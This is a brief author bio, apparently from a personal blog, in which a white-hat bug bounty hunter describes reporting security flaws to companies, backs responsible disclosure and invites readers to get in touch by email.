I am a bug bounty hunter with notable references as Google, Facebook, Microsoft, Yahoo, Metallica and so on. Yes, I am a white hat hacker, which means I hunt for security leaks, but instead of exploiting them, reporting them to the vendor. I’m a die-hard forefighter of responsible disclosure and believe it is the best solution to fight the upcoming trend of security breaches.

I could write a whole book on myself and my opinion on disclosure models, but that’s not the purpose of this blog. If you have any further questions, come and say hi at inti.de.ceukelaire [at] gmail.com.

Enjoy your stay!